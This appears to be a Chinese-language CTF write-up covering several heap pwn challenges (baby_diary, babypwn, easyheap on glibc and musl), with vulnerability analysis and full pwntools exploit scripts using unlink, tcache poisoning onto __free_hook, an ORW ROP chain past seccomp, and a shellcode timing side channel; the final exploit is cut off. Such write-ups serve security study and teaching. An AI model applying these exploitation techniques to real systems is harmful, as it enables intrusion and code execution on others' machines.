        compare = "cmp byte ptr[rsi+{0}],{1};jz $-3;ret".format(index, ch)
    else:
        compare = "cmp byte ptr[rsi+{0}],{1};jz $-4;ret".format(index, ch)

    code_x86 = asm(_SHELLCODE_X86, arch='i386', os='linux')
    code_flag = asm(_SHELLCODE_FLAG + compare, arch='amd64', os='linux')
    # NOP padding so the 64-bit stage sits at the address pushed before retfq
    # (0x40404089), assuming the 32-bit stage assembles to the length the
    # author measured -- TODO confirm if the 32-bit stage is edited.
    stage2 = code_x86 + 0x29*b'\x90' + code_flag

    p.sendline(stage2)

# Timing side channel: recover the flag one byte at a time. A correct guess
# makes the remote shellcode spin, so recv() runs into its timeout; a wrong
# guess makes the target die quickly.
index = 0
a = []  # recovered flag bytes, as ints
while True:
    for ch in range(0x20, 127):
        local = 1
        if local:
            p = process(challenge)
        else:
            p = remote('119.13.105.35','10111')
        pwn(p, index, ch)
        start = time.time()
        try:
            p.recv(timeout=2)
            print("".join([chr(i) for i in a]))
        except EOFError:
            # Wrong guess: the target exited and closed the pipe. Only this
            # expected error is swallowed; the original bare `except:` also hid
            # Ctrl-C and genuine bugs.
            pass
        end = time.time()
        p.close()
        if end-start > 1.5:
            a.append(ch)
            print("".join([chr(i) for i in a]))
            break
    else:
        # No printable byte matched at this index: the flag is complete.
        print("".join([chr(i) for i in a]))
        break
    index = index + 1
    print("".join([chr(i) for i in a]))

p.interactive()

baby_diary

1
2
3
4
5
6
baby_diary: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=664bd170fa1869d1e8bae262af76385c91c3e97d, for GNU/Linux 3.2.0, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
GNU C Library (Ubuntu GLIBC 2.31-0ubuntu9.2) stable release version 2.31.

漏洞分析

整数溢出:

1
chunk_list[i] = (char *)malloc(size + 1);

负数溢出:

1
2
3
index = input();
if ( check(index) )
printf("content: %s\n", (const char *)chunk_list[index]);

有 off-by-one 漏洞:

1
2
3
4
chunk = chunk_list[index];
size_list[index] = len;
if ( len )
chunk[len + 1] = (chunk[len + 1] & 0xF0) + code2(index);
  • 可以控制 chunk[len + 1] 的低 4 位(取值范围 0x0-0xf)

入侵思路

本题目的核心点就是无泄露 unlink,对于所有的无泄漏 unlink 都可以考虑如下的堆风水:

  • 获取两个 unsorted chunk 进行合并,其中的第二个 chunk 末地址必须为 \x00(遗留下 FD BK 指针)
  • 重新申请大 unsorted chunk 后释放(不破坏原来的 heap 结构),然后再次进行分割,使第二个 chunk 的末尾地址为 \x30 或者 \x40 \x50 等等(有一定偏移的地址都可以)
  • 之后利用 unsortedbin 进行调整,在 FD->bk 和 BK->fd 中写入 \x30,然后覆盖为 \x00

不过本题目有点特殊,在具体的堆风水在构建时需要作出微调,可以参考如下的泄露脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
# Heap feng shui for the leak-less unlink, ending in a libc leak.
# Trailing "#N" notes are the author's slot indices; hex notes such as 0x2b0
# are the author's heap offsets.
add(0x418) #0
add(0x210) #1
add(0x428) #2
add(0x438) #3
add(0x378,"8"*0x10) #4
add(0x428) #5
add(0x208) #6

dele(0)
dele(3)
dele(5)
dele(2)

add(0x440,0x427*"\x00"+"\x0e") #0
dele(0)
add(0x440,0x426*"\x00"+"\x01") #0
add(0x418) #3 0x2b0

add(0x418) #2 0xd20 - over \x00 to bk/fd
add(0x428) #5 0x370

dele(3) # 0x2b0 - bk=0xd20
dele(2) # 0xd20

add(0x418,'\x00'*7+"\x0d"+"\n") #2 repair fd->bk (low byte overwritten with \x00)
add(0x418) #3

dele(3) # 0xd20
dele(5) # 0x350 - fd=0xd20

add(0x9f8) #3 make 0x350 to large
add(0x428,"\n") #5 repair bk->fd (low byte overwritten with \x00)

dele(6)
add(0x208,0x208*"\x00")

dele(6)
add(0x208,0x1ff*"\x00"+"\x0e")

add(0x418) #7
add(0x208) #8

dele(3)
add(0x430,flat(0,0,0,p64(0x421))) #3
add(0x1600) #9

# Read six bytes of a libc pointer through the overlapped chunk.
show(4)
ru(" content: ")
# NOTE(review): ljust() with a str fill only works when recv() returns str
# (Python 2); on Python 3 the fill must be b"\x00".
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x1ec210
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

最后调整一下堆风水,劫持 tcache attack 就可以了

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
# -*- coding:utf-8 -*-
from signal import pause
from pwn import *

# ---- target and pwntools configuration ----
arch = 64
challenge = './baby_diary1'

context.os = 'linux'
#context.log_level = 'debug'
if arch == 64:
    context.arch = 'amd64'
if arch == 32:
    context.arch = 'i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

# ---- short aliases over the global tube `p` (looked up at call time) ----
rl = lambda a=False: p.recvline(a)
ru = lambda a, b=True: p.recvuntil(a, b)
rn = lambda x: p.recvn(x)
sn = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda a, b: p.sendafter(a, b)
sla = lambda a, b: p.sendlineafter(a, b)
irt = lambda: p.interactive()
dbg = lambda text=None: gdb.attach(p, text)
# Log "<expr> --> 0x<value>" in colour. `s` is evaluated with eval(), so only
# ever pass names written in this script. The ANSI escape needs the leading
# \033; the scraped text had lost it.
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Zero-pad a short leak before unpacking. The fill byte must be exactly one
# byte long; the scraped b'x00' (three bytes) makes ljust() raise.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

# ---- connect: local process or remote service ----
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')


def debug():
    """Attach gdb with a breakpoint at PIE offset 0x17D7."""
    #gdb.attach(p)
    gdb.attach(p, "b *$rebase(0x17D7)\n")
    #pause()


def cmd(op):
    """Answer the '>>' menu prompt with the given option."""
    sla(">>", str(op))


def add(size, data="\n"):
    """Menu option 1: create an entry.

    The value sent to the program is `size - 1`; the program itself calls
    malloc(size + 1) on what it receives, so the argument here equals the
    malloc request size.
    """
    cmd(1)
    sla(" size:", str(size-1))
    sla(" content: ", data)


def show(index):
    """Menu option 2: print the entry at `index`."""
    cmd(2)
    sla("index:", str(index))


def dele(index):
    """Menu option 3: free the entry at `index`."""
    cmd(3)
    sla("index:", str(index))

# Exploit body for baby_diary: leak-less unlink -> libc leak -> tcache
# poisoning onto __free_hook.
# Trailing "#N" notes are the author's slot indices; hex notes such as 0x2b0
# are the author's heap offsets.
#debug()

add(0x418) #0
add(0x210) #1
add(0x428) #2
add(0x438) #3
add(0x378,"8"*0x10) #4
add(0x428) #5
add(0x208) #6

dele(0)
dele(3)
dele(5)
dele(2)

add(0x440,0x427*"\x00"+"\x0e") #0
dele(0)
add(0x440,0x426*"\x00"+"\x01") #0
add(0x418) #3 0x2b0

add(0x418) #2 0xd20 - over \x00 to bk/fd
add(0x428) #5 0x370

dele(3) # 0x2b0 - bk=0xd20
dele(2) # 0xd20

add(0x418,'\x00'*7+"\x0d"+"\n") #2 repair fd->bk (low byte overwritten with \x00)
add(0x418) #3

dele(3) # 0xd20
dele(5) # 0x350 - fd=0xd20

add(0x9f8) #3 make 0x350 to large
add(0x428,"\n") #5 repair bk->fd (low byte overwritten with \x00)

dele(6)
add(0x208,0x208*"\x00")

dele(6)
add(0x208,0x1ff*"\x00"+"\x0e")

add(0x418) #7
add(0x208) #8

dele(3)
add(0x430,flat(0,0,0,p64(0x421))) #3
add(0x1600) #9

# Read six bytes of a libc pointer through the overlapped chunk.
show(4)
ru(" content: ")
# NOTE(review): ljust() with a str fill only works when recv() returns str
# (Python 2); on Python 3 the fill must be b"\x00". The str + p64(...)
# concatenations below have the same constraint.
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x1ec210
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
success("free_hook >> "+hex(free_hook))
success("system >> "+hex(system))

# Put several 0x210-sized chunks into tcache, then use the overlapping chunk
# to overwrite a freed chunk's next pointer with __free_hook.
add(0x208,0x100*"\x00")
add(0x208,0x100*"\x00")
add(0x208,0x100*"\x00")
dele(4)
dele(11)
dele(12)
dele(6)

payload = 0x178*"\x00"+p64(0x211)+p64(free_hook)+p64(free_hook)
add(0x300,payload)

# First allocation holds "/bin/sh"; the second lands on __free_hook and writes
# system there. Freeing slot 6 then calls system("/bin/sh").
add(0x208,"/bin/sh\x00")
add(0x208,p64(system))
dele(6)

p.interactive()

babypwn

1
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.
1
2
3
4
5
6
babypwn: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=721c84a30c78ecb82a98a6d484d884a502b54fd6, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
2
3
4
5
6
7
8
9
10
 line  CODE  JT   JF      K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL
  • 禁用 execve

漏洞分析

程序在 edit 完后会从 chunk 起始位置开始扫描,把遇到的第一个 0x11 置空后返回,但是扫描没有限制范围(只在遇到 \x00 时停止):

1
2
3
4
5
6
7
8
9
10
11
12
void __fastcall change(char *chunk)
{
while ( *chunk )
{
if ( *chunk == 0x11 )
{
*chunk = 0;
return;
}
++chunk;
}
}
  • 有 off-by-null 漏洞

入侵思路

程序的泄露模块需要逆向,先进行一波分析:

1
2
3
for ( i = 2; i > 0; --i )
a1 ^= (32 * a1) ^ ((a1 ^ (32 * a1)) >> 17) ^ (((32 * a1) ^ a1 ^ ((a1 ^ (32 * a1)) >> 17)) << 13);
return printf("%lx\n", a1);

直接使用 z3 求解,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
def decode(target):
    """Invert the two-round 32-bit scramble the program applies before printing.

    Args:
        target: the scrambled 32-bit value printed by the program.

    Returns:
        The original 32-bit value, as an int.

    Raises:
        ValueError: if no input maps to `target`. The original fell through to
            `return re` with `re` unbound in that case.
    """
    seed = BitVec("a1", 32)
    mixed = seed
    for _ in range(2):
        # LShR is z3's logical right shift; `>>` on a BitVec is arithmetic.
        mixed ^= (32 * mixed) ^ LShR((mixed ^ (32 * mixed)), 17) ^ (((32 * mixed) ^ mixed ^ LShR((mixed ^ (32 * mixed)), 17)) << 13)

    solver = Solver()
    solver.add(target == mixed)
    if solver.check() != sat:
        raise ValueError("no preimage found for 0x%x" % target)

    model = solver.model()
    print(model)
    # Ask the model for the symbol directly instead of splitting its string
    # form and passing the pieces to eval().
    result = model[seed].as_long()

    print(hex(result))
    return result
  • 这里弄了好久,最后发现 z3 的 BitVec 不能直接用 >> 做逻辑右移(>> 是算术右移),要用对应的函数 LShR

泄露 heap_base 很容易就能打 unlink 实现堆重叠,程序开了沙盒,需要使用堆上 ORW 的技术:

  • 限制了 size 大小(难以打 largebin attack),但通过劫持 tcache 可以打 IO
  • 也可以通过 TLS 泄露栈地址,然后劫持 tcache 打栈

这里我选择了后者(一般来说,程序如果限制 size 为 unsorted chunk 则选择前者,限制 size 为 tcache 就选择后者)

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
# -*- coding:utf-8 -*-
from pwn import *
from z3 import *

# ---- target and pwntools configuration ----
arch = 64
challenge = './babypwn1'

context.os = 'linux'
#context.log_level = 'debug'
if arch == 64:
    context.arch = 'amd64'
if arch == 32:
    context.arch = 'i386'

elf = ELF(challenge)
libc = ELF('libc-2.27.so')

# ---- short aliases over the global tube `p` (looked up at call time) ----
rl = lambda a=False: p.recvline(a)
ru = lambda a, b=True: p.recvuntil(a, b)
rn = lambda x: p.recvn(x)
sn = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda a, b: p.sendafter(a, b)
sla = lambda a, b: p.sendlineafter(a, b)
irt = lambda: p.interactive()
dbg = lambda text=None: gdb.attach(p, text)
# Log "<expr> --> 0x<value>" in colour. `s` is evaluated with eval(), so only
# ever pass names written in this script. The ANSI escape needs the leading
# \033; the scraped text had lost it.
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
# Zero-pad a short leak before unpacking. The fill byte must be exactly one
# byte long; the scraped b'x00' (three bytes) makes ljust() raise.
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))

# ---- connect: local process or remote service ----
local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')


def debug():
    """Attach gdb with a breakpoint at PIE offset 0xFCB and wait for the user."""
    #gdb.attach(p)
    gdb.attach(p, "b *$rebase(0xFCB)\n")
    pause()


def cmd(op):
    """Answer the '>>>' menu prompt with the given option."""
    sla(">>>", str(op))


def add(size): # 17
    """Menu option 1: allocate a chunk of `size` bytes."""
    cmd(1)
    sla("size:", str(size))


def dele(index):
    """Menu option 2: free the chunk at `index`."""
    cmd(2)
    sla("index:", str(index))


def edit(index, data):
    """Menu option 3: write `data` into the chunk at `index`."""
    cmd(3)
    sla("index:", str(index))
    sla("content:", data)


def show(index):
    """Menu option 4: print the scrambled content of the chunk at `index`."""
    cmd(4)
    sla("index:", str(index))

def decode(target):
    """Invert the two-round 32-bit scramble the program applies before printing.

    Args:
        target: the scrambled 32-bit value printed by the program.

    Returns:
        The original 32-bit value, as an int.

    Raises:
        ValueError: if no input maps to `target`. The original fell through to
            `return re` with `re` unbound in that case.
    """
    seed = BitVec("a1", 32)
    mixed = seed
    for _ in range(2):
        # LShR is z3's logical right shift; `>>` on a BitVec is arithmetic.
        mixed ^= (32 * mixed) ^ LShR((mixed ^ (32 * mixed)), 17) ^ (((32 * mixed) ^ mixed ^ LShR((mixed ^ (32 * mixed)), 17)) << 13)

    solver = Solver()
    solver.add(target == mixed)
    if solver.check() != sat:
        raise ValueError("no preimage found for 0x%x" % target)

    model = solver.model()
    print(model)
    # Ask the model for the symbol directly instead of splitting its string
    # form and passing the pieces to eval().
    result = model[seed].as_long()

    print(hex(result))
    return result

def leak_u64():
    """Rebuild a 64-bit value from the output of show().

    Skips one line, then reads two lines of hex, each a scrambled 32-bit half
    (low half first), unscrambles them with decode() and joins them.
    int(..., 16) replaces the original eval() on data received from the target.
    """
    ru("\n")
    low = decode(int(ru("\n"), 16))
    high = decode(int(ru("\n"), 16))
    return low + high * 0x100000000


# ---- 1. heap leak ----
add(0xe0)
show(0)
leakaddr = leak_u64()
heap_base = leakaddr - 0x670
success("leakaddr >> "+hex(leakaddr))
success("heap_base >> "+hex(heap_base))

# ---- 2. off-by-null + forged chunk -> unlink -> overlapping chunks ----
# NOTE(review): the trailing "#N" labels are the author's and look one lower
# than the indices used by the edit() calls -- confirm.
add(0x108)#0
heap_addr = heap_base + 0xf60
payload = p64(0)+p64(0x541)
payload += p64(heap_addr+0x30)+p64(heap_addr+0x30)+p64(0)+p64(0)+p64(heap_addr+0x10)+p64(heap_addr+0x10)
edit(1,payload)
add(0x108)#1
add(0x108)#2
add(0x108)#3
add(0x108)#4
add(0x108)#5

# Byte literals keep the payloads valid on Python 3 as well, where
# str + p64(...) raises TypeError.
payload = b"a"*0x108
edit(5,payload)
payload = b"a"*0x100+p64(0x540)
edit(5,payload)
payload = b"\x00"*0xf0+p64(0)+p64(0x111)
edit(6,payload)

# Fill the 0x100 tcache bin so the next free goes to the unsorted bin.
for i in range(7):
    add(0xf8)

for i in range(7):
    dele(i+7)

dele(6)
add(0x30)

# ---- 3. libc leak ----
show(6)
leakaddr = leak_u64()
libc_base = leakaddr - 0x3ec120
success("leakaddr >> "+hex(leakaddr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base + libc.sym["__free_hook"]
set_context = libc_base + libc.sym["setcontext"]+61
# Address at a fixed offset from the libc base that holds a stack pointer
# (the write-up leaks the stack address through TLS).
stack_libc = libc_base + 0x5d1a40

for i in range(5):
    dele(4-i)

# ---- 4. tcache poisoning -> stack leak ----
payload = 0xb8*b"a"+p64(0x111)+p64(stack_libc)+p64(heap_base+0x10)
add(0x200)
edit(0,payload)

add(0x108)#1
add(0x108)#2
add(0x108)#3

show(3)
leakaddr = leak_u64()
stack_base = leakaddr - 0x1fc90
success("leakaddr >> "+hex(leakaddr))
success("stack_base >> "+hex(stack_base))

dele(1)
dele(5)

# Gadgets, as offsets into the libc-2.27.so loaded above.
pop_rax_ret = libc_base+0x000000000001b500
pop_rdi_ret = libc_base+0x000000000002164f
pop_rsi_ret = libc_base+0x0000000000023a6a
pop_rdx_ret = libc_base+0x0000000000001b96
syscall_ret = libc_base+0x00000000000d2625

# ---- 5. tcache poisoning -> chunk on the stack ----
add(0x200)
payload = b"b"*0x1d8+p64(0x100)+p64(stack_base+0x1fc48)
edit(1,payload)

# ---- 6. ORW ROP chain (execve is blocked by seccomp) ----
# stack_base+0x1fd20 is used both as the path argument and as the I/O buffer;
# the "./flag" string is appended at the end of the chain.
# open(path, 0, 0)
payload = b""
payload += p64(pop_rax_ret) + p64(2)
payload += p64(pop_rdi_ret) + p64(stack_base+0x1fd20)
payload += p64(pop_rsi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(0)
payload += p64(syscall_ret)
# read(3, buf, 0x60) -- assumes open() returned fd 3
payload += p64(pop_rax_ret) + p64(0)
payload += p64(pop_rdi_ret) + p64(3)
payload += p64(pop_rsi_ret) + p64(stack_base+0x1fd20)
payload += p64(pop_rdx_ret) + p64(0x60)
payload += p64(syscall_ret)
# write(1, buf, 0x60)
payload += p64(pop_rax_ret) + p64(1)
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_ret) + p64(stack_base+0x1fd20)
payload += p64(pop_rdx_ret) + p64(0x60)
payload += p64(syscall_ret)
payload += b"./flag\x00"

#debug()

# The second allocation is served from the poisoned tcache entry (the stack).
add(0x108)
add(0x108)
edit(5,payload)

p.interactive()

easyheap

1
2
3
4
5
6
easyheap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-x86_64.so.1, stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开

程序给了一个 libc.so,一番查找后发现这是一个 musl libc:

1
2
3
4
5
➜  pwn ./libc.so        
musl libc (x86_64)
Version 1.2.2
Dynamic Program Loader
Usage: ./libc.so [options] [--] pathname [args]
  • PS:musl 只有一个 libc.so,它既作为 libc 也作为 ld(动态加载器)

对于 musl libc,patchelf 是无效的,需要将题目提供的 libc.so 复制到对应的目录:

1
cp libc.so /usr/lib/x86_64-linux-musl/libc.so

程序分析

想要开启程序核心功能必须先逆向解密:

1
2
3
4
5
6
7
8
9
10
do
{
data = *codep;
keyp += 2;
++codep;
sprintf(keyp, "%02x", (unsigned __int8)data ^ 0x23u);
}
while ( keyp != (char *)&zero );
if ( key[0] ^ 0x3036323130313437LL | key[1] ^ 0x6337303165363331LL
|| key[2] ^ 0x3237633763343735LL | key[3] ^ 0x3231313131363437LL )

脚本如下:

1
2
3
4
5
6
7
8
9
import struct

# The four little-endian qwords that the binary compares against the
# hex-encoded, XOR-ed activation code.
key = [0x3036323130313437, 0x6337303165363331, 0x3237633763343735, 0x3231313131363437]


def decode_key(words, xor_byte=0x23):
    """Recover the activation code from the constants the binary checks.

    The program hex-encodes ``char ^ 0x23`` for every input character with
    ``sprintf("%02x")`` and compares the resulting text, read as 64-bit
    little-endian integers, with ``words``.  Undo both steps: unpack the
    integers back into hex text, then decode each hex pair and XOR it.

    words    -- iterable of 64-bit integers holding the expected hex text
    xor_byte -- value XOR-ed into every character (0x23 in this binary)
    Returns the decoded code as a str.
    """
    hex_text = b"".join(struct.pack("<Q", word) for word in words).decode("ascii")
    return "".join(chr(value ^ xor_byte) for value in bytes.fromhex(hex_text))


print(decode_key(key), end="") # W31C0M3_to_QWB21

函数 Prepare 提供了4种核心功能:

1
2
3
4
5
.data:0000000000204300 90 18 00 00 00 00 00 00 90 14+funcs dq offset add                     ; DATA XREF: Prepare+230↑o
.data:0000000000204300 00 00 00 00 00 00 70 15 00 00+ ; Prepare+23C↑r
.data:0000000000204300 00 00 00 00 00 1A 00 00 00 00+dq offset dele
.data:0000000000204300 00 00 dq offset show
.data:0000000000204300 dq offset edit
  • add:输入 size 作为 num 的个数,然后输入 size 个 num,申请 (num+1)*4 大小的 chunk,以4字节为单位将数据写入 chunk,最后调用 get_op 依次遍历这些数字,并依次随机选择四则运算中的一个运算操作符进行运算,将运算结果填充到最后一个数字槽中
  • edit:重新输入 size 个 num,调用 get_op 进行计算,并将结果写回(位置错误)

函数 Challenge 需要对最后一个随机生成的数字进行猜测,程序对每一次猜测提供了两次 Silver Finger 和全局两次 Golden Finger 的功能:

  • Silver Finger 只会允许跳过当前级别对数字的猜测
  • Golden Finger 会根据用户输入的数字的数量,得到最终正确答案的数字

漏洞分析

函数 add 执行结果回写的代码:

1
2
data = &node->chunk[size + 1 - 1];
*data = get_op(chunk, size);

函数 edit 执行结果回写的代码:

1
2
sizea = size + 1;
chunk[sizea] = get_op(chunk, sizea);
  • 可以发现,函数 edit 有明显的4字节溢出

打印数据时,会输出38字节,但是 info.header->name 的值可能小于38字节:

1
2
printf("#   Name: %-38s #\n", (const char *)&info.header->name);
printf("# Level: %-38d#\n", **(unsigned int **)((char *)&info.header->level + info.header->size));
1
2
puts("Input your name!");
readn(info.header->name, len);

输入 num 时没有进行限制,导致可以将 heap 上的任意数据写入 mmapg

1
2
3
num = input_num();
......
mmapg[index] = chunk[num];

libc musl

musl 把 chunk 大小分为48类,用 size_to_class 进行计算(与 *active[48] 对应)

mallocng 在分配 meta 时,总是先分配一页的内存,然后划分为多个 meta 区域,而该页的最开始存放的就是 meta_area(这一页的内存用于管理 chunk)

1
2
3
4
5
6
struct meta_area {
	uint64_t check; /* matched against malloc_context->secret */
	struct meta_area *next; /* pointer to the next node */
	int nslots; /* number of meta entries currently in use */
	struct meta slots[]; /* the meta array itself: the memory right after this header holds the metas */
};
1
2
3
4
5
6
7
8
9
struct meta {
	struct meta *prev, *next; /* doubly linked list */
	struct group *mem; /* points to the group */
	volatile int avail_mask, freed_mask; /* bitmaps of available / freed chunks */
	uintptr_t last_idx:5; /* index of the last chunk */
	uintptr_t freeable:1;
	uintptr_t sizeclass:6; /* size class of the group; fixed at 63 when mem was allocated with mmap */
	uintptr_t maplen:8*sizeof(uintptr_t)-12; /* page count when the group was allocated with mmap, otherwise 0 */
};

多个相同大小的 chunk(物理相邻)以及一些控制信息会组成 group

1
2
3
4
5
6
struct group {
	struct meta *meta; /* points back to the owning meta */
	unsigned char active_idx:5;
	char pad[UNIT - sizeof(struct meta *) - 1]; /* pads the header to 0x10 bytes (UNIT is 0x10) */
	unsigned char storage[]; /* chunk data */
};

chunk 没有专门在代码中定义,但总体结构如下:

1
2
3
4
5
6
/* Illustrative layout only: the allocator source defines no such struct. */
struct chunk {
	char prev_user_data[]; /* holds data belonging to the previous chunk */
	uint8_t idx; /* low 5 bits: index of this chunk inside its group; high 3 bits: reserved */
	uint16_t offset; /* offset from the first chunk */
	char user_data[]; /* user data */
};

测试案例:

1
2
3
add([1]*6)
add([2]*6)
add([3]*6)

可以在 GDB 中打印此数据:

1
2
3
4
5
6
7
8
pwndbg> x/20xw 0x555555604cc0 /* 释放前 */
0x555555604cc0: 0x556060e0 0x00005555 0x0000000e 0x00000000 /* chunk1 */
0x555555604cd0: 0x00000001 0x00000001 0x00000001 0x00000001
0x555555604ce0: 0x00000001 0x00000001 0xffffffff 0x00020100 /* chunk2 */
0x555555604cf0: 0x00000002 0x00000002 0x00000002 0x00000002
0x555555604d00: 0x00000002 0x00000002 0xfffffffa 0x00040200 /* chunk3 */
0x555555604d10: 0x00000003 0x00000003 0x00000003 0x00000003
0x555555604d20: 0x00000003 0x00000003 0x0000000f 0x00000000
1
2
3
4
5
6
7
8
pwndbg> x/20xw 0x555555604cc0 /* 释放后 */
0x555555604cc0: 0x00000000 0x00000000 0x0000000e 0x0000ff00 /* chunk1 */
0x555555604cd0: 0x00000001 0x00000001 0x00000001 0x00000001
0x555555604ce0: 0x00000001 0x00000001 0x00000002 0x0000ff00 /* chunk2 */
0x555555604cf0: 0x00000002 0x00000002 0x00000002 0x00000002
0x555555604d00: 0x00000002 0x00000002 0x00000010 0x0000ff00 /* chunk3 */
0x555555604d10: 0x00000003 0x00000003 0x00000003 0x00000003
0x555555604d20: 0x00000003 0x00000003 0xfffffffd 0x00000000
  • 前6个数据是输入的 num,第7个数据是计算的结果,第8个数据就是 idx offset

musl 中的 unlink 依赖于如下的函数,本身缺乏检查:

1
2
3
4
5
6
7
8
9
10
11
/* Remove meta m from the circular doubly linked list whose head is *phead. */
static inline void dequeue(struct meta **phead, struct meta *m)
{
	if (m->next != m) {
		/* m->prev and m->next are used as-is, without any validation:
		 * these two stores write through whatever pointers m holds. */
		m->prev->next = m->next;
		m->next->prev = m->prev;
		/* Advance the head when the removed node was the head. */
		if (*phead == m) *phead = m->next;
	} else {
		/* m links to itself, i.e. it was the only node: the list becomes empty. */
		*phead = 0;
	}
	m->prev = m->next = 0;
}

dequeue函数的触发条件如下:

  • 队列不能为空
  • 队列的头指针不能为空
  • 队列中至少有一个元素

入侵思路

现在有4字节的溢出,可以覆盖 chunk->idx,offset,不过首先需要利用溢出泄露 libc_base:

1
2
3
4
5
6
7
8
9
10
11
12
13
prepare()
add([0xFFFFFFFF]*20) # 0
dele(0)
add([0x0]*3) # 0
exit()
challenge([0x0], "d" * 0x18, True)
pause()
show()
ru('\xff'*0x18)
leak_addr = u64(p.recv(6).ljust(8, '\x00'))
libc_base = leak_addr - 0xb7870
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))
1
2
3
4
5
6
pwndbg> telescope 0x7ffff7ffec78
00:0000│ rsi 0x7ffff7ffec78 ◂— 0x6464646464646464 ('dddddddd')
... ↓ 2 skipped
03:0018│     0x7ffff7ffec90 ◂— 0xffffffffffffffff
... ↓ 2 skipped
06:0030│     0x7ffff7ffeca8 —▸ 0x7ffff7ffe870 ◂— 0x1

由于 meta 所在页与 group 所在页分离,想要伪造 meta,就必须要泄露 secret:

1
mmapg[index] = chunk[num];
  • 由于 num 没有限制,因此可以将 heap 上的 secret 写入 mmapg
1
2
3
4
prepare()
add([0x0]*3) #1
exit()
challenge([("whos_your_daddy", 1228),("whos_your_daddy", 1221)])

接下来就是布置堆风水,将当前堆块的最后 8 个字节(最后两个 4 字节数字槽)设置为 0xdeadbeef010,通过 4 字节溢出将下一个堆块的 offset 值设置为 0

释放下一个 chunk,将 meta 劫持到 0xdeadbeef010 处,然后程序会执行 dequeue 将 fake meta unlink,在此处会触发一次 WAA 任意写,我们的目标就是劫持 musl IO 并执行 system

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
# -*- coding:utf-8 -*-
from signal import pause
from pwn import *

